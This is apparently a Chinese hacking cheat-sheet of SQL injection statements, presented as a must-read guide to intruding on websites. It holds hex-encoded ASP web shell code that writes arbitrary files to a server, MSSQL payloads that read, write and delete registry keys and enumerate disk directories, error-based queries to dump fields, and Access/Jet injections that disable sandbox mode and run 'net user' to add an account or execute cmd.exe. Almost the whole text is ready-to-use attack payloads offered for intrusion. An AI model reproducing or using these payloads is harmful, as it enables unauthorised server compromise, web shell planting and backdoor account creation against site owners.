多事之秋整理的sql注入语句 (4) .txt

常用网站入侵方法总结。详细而且使用.学习入侵必看

 743E2220253E
0x3C2520656C736520253E
0x3C2520726573706F6E73652E777269746520223C666F6E7420636F6C6F723D7265643E5361766520556E53756363657373213C2F666F6E743E2220253E
0x3C2520656E6420696620253E
0x3C25206572722E636C65617220253E
0x3C2520656E6420696620253E
0x3C25206F626A436F756E7446696C652E436C6F736520253E
0x3C2520536574206F626A436F756E7446696C653D4E6F7468696E6720253E
0x3C2520536574206F626A46534F203D204E6F7468696E6720253E
0x3C2520526573706F6E73652E777269746520223C666F726D20616374696F6E3D2727206D6574686F643D706F73743E2220253E
0x3C2520526573706F6E73652E777269746520224FDD5B5865874EF676843C666F6E7420636F6C6F723D7265643E7EDD5BF98DEF5F8428530562EC65874EF6540D3A5982443A5C7765625C782E617370293A3C2F666F6E743E2220253E
0x3C2520526573706F6E73652E577269746520223C696E70757420747970653D74657874206E616D653D73796664706174682077696474683D33322073697A653D35303E2220253E
0x3C2520526573706F6E73652E577269746520223C62723E2220253E
0x3C2520526573706F6E73652E77726974652022672C65874EF67EDD5BF98DEF5F842220253E
0x3C25203D7365727665722E6D61707061746828526571756573742E5365727665725661726961626C657328225343524950545F4E414D4522292920253E
0x3C2520526573706F6E73652E777269746520223C62723E2220253E
0x3C2520526573706F6E73652E777269746520228F9351659A6C768451855BB93A2220253E
0x3C2520526573706F6E73652E777269746520223C7465787461726561206E616D653D637966646461746120636F6C733D383020726F77733D31302077696474683D33323E3C2F74657874617265613E2220253E
0x3C2520526573706F6E73652E777269746520223C696E70757420747970653D7375626D69742076616C75653D4FDD5B583E2220253E
0x3C2520526573706F6E73652E777269746520223C2F666F726D3E2220253E

95、mssql中的存储过程
(1)xp_regenumvalues 注册表根键, 子键 
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'　　以多个记录集方式返回所有键值 
(2)xp_regread 根键,子键,键值名 
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'　返回制定键的值 
(3)xp_regwrite 根键,子键, 值名, 值类型, 值 
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'　写入注册表 
(4)xp_regdeletevalue 根键,子键,值名 
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'　 删除某个值 
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'　 删除键,包括该键下所有值 

96、磁盘目录读取代码
(1) ;drop table [jm_tmp];create table [jm_tmp](subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)-- 创建表

(2) ;delete [jm_tmp];Insert [jm_tmp] exec master..xp_dirtree 'C:\',1,1-- 将C盘的文件夹及文件插入到表中

(3) and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top 1 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第一个文件夹名称

(4) and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top 2 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第二个文件夹名称

(5) and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top X [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第X个文件夹或文件名称

(6);drop table [jm_tmp]--删除此表
97、暴指定记录的字段：
暴第一条记录字段
and (select top 1 列名 from 表名)>0
暴指字记录字段(第二条记录）
and (select 列名 from (select top 1 * from (select top 2 * from 表名 order by 1) T order by 1 desc)S)>0
and (select 列名 from (select top 1 * from (select top x * from 表名 order by 1) T order by 1 desc)S)>0  注：X为指定的第X条记录
98、sa Injection中利用Access执行命令
(1);exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engine\SandBoxMode',REG_DWORD,0--
(2);select * from openRowset('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user kev 1986 /add")');--
注：还可以用工具soshell.exe
99、access注入点执行命令
http://127.0.0.1/a.asp?id=1 and 0<>(select shell("cmd.exe /c net user >c:\c:\inetpub\wwwroot/kev.txt))%00